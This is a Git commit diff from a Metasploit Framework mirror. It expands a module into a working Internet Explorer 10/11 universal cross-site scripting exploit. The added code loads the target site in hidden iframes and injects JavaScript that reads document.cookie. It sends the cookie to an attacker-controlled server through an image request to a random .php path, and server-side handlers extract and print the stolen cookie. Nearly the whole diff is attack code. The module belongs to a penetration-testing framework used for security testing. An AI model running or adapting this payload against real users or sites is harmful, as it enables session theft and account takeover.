infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Final

bug/bundler_fix
sinn3r 2015-02-05 04:36:44 -06:00
parent 1ccfb6cb43
commit 75c697c4dc
1 changed files with 73 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

83
modules/auxiliary/gather/ie_uxss.rb
View File

@ -11,14 +11,23 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "Microsoft Internet Explorer Cross-domain JavaScript Injection", 'Name' => "Microsoft Internet Explorer 10 and 11 Cross-domain Cookie Stealing",
'Description' => %q{ 'Description' => %q{
This is an example of building a browser exploit using the BrowserExploitServer mixin This module exploits a universal cross-site scripting vulnerability found in Internet
Explorer 10 and 11. It will steal the cookie of a specific webiste (set by the TARGET_URI
datastore option). You will also most likely need to configure the SERVER_PUBLIC_IP
datastore option in order receive the cookie. If you and the victim are actually in the
same network, then you don't need to touch SERVER_PUBLIC_IP.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ], 'Author' =>
[
'David Leo', # Original discovery
'sinn3r' # MSF
],
'References' => 'References' =>
[ [
[ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ], [ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ] [ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
], ],
@ -29,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
register_options( register_options(
[ [
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]), OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
#OptString.new('CUSTOM_JS', [ false, 'Custom JavaScript to inject (default: cookie stealing)' ]) OptString.new('SERVER_PUBLIC_IP', [ false, 'The exploit\'s public facing IP (Default: Internal IP)']),
], self.class) ], self.class)
end end
@ -49,12 +58,55 @@ class Metasploit3 < Msf::Auxiliary
@html ||= html @html ||= html
end end
def ninja_cookie_stealer_name
@ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
end
def get_uri(cli=self.cli)
ssl = !!(datastore["SSL"])
proto = (ssl ? "https://" : "http://")
if datastore['URIHOST']
host = datastore['URIHOST']
elsif datastore['SERVER_PUBLIC_IP']
host = datastore['SERVER_PUBLIC_IP']
elsif (cli and cli.peerhost)
host = Rex::Socket.source_address(cli.peerhost)
else
host = srvhost_addr
end
if Rex::Socket.is_ipv6?(host)
host = "[#{host}]"
end
if datastore['URIPORT'] != 0
port = ':' + datastore['URIPORT'].to_s
elsif (ssl and datastore["SRVPORT"] == 443)
port = ''
elsif (!ssl and datastore["SRVPORT"] == 80)
port = ''
else
port = ":" + datastore["SRVPORT"].to_s
end
uri = proto + host + port + get_resource
uri
end
def server_uri
@server_uri ||= get_uri
end
def html def html
%Q| %Q|
<iframe src="#{get_resource}/redirect.php"></iframe> <iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>
<iframe src="#{datastore['TARGET_URI']}"></iframe> <iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>
<script> <script>
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:alert(document.domain)"'); w = window.frames[0];
var payload = "var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);"
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');
</script> </script>
| |
end end
@ -63,15 +115,26 @@ class Metasploit3 < Msf::Auxiliary
exploit exploit
end end
def extract_cookie(uri)
Rex::Text.uri_decode(uri.to_s.scan(/#{ninja_cookie_stealer_name}\?data=(.+)/).flatten[0].to_s)
end
def on_request_uri(cli, request) def on_request_uri(cli, request)
print_status(request.uri)
case request.uri case request.uri
when /redirect\.php/ when /redirect\.php/
print_status("sending redirect") print_status("sending redirect")
send_redirect(cli, "#{datastore['TARGET_URI']}") send_redirect(cli, "#{datastore['TARGET_URI']}")
when /sleep.php/ when /sleep\.php/
sleep(1) sleep(3)
send_response(cli, '') send_response(cli, '')
when /#{ninja_cookie_stealer_name}/
data = extract_cookie(request.uri)
if data.blank?
print_status("The XSS worked, but no cookie")
else
print_status("Got cookie")
print_line(data)
end
else else
print_status("sending html") print_status("sending html")
send_response(cli, get_html) send_response(cli, get_html)